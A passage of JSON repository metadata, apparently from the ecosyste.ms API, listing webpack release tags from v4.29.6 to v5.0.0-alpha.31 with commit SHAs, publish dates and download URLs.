v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","de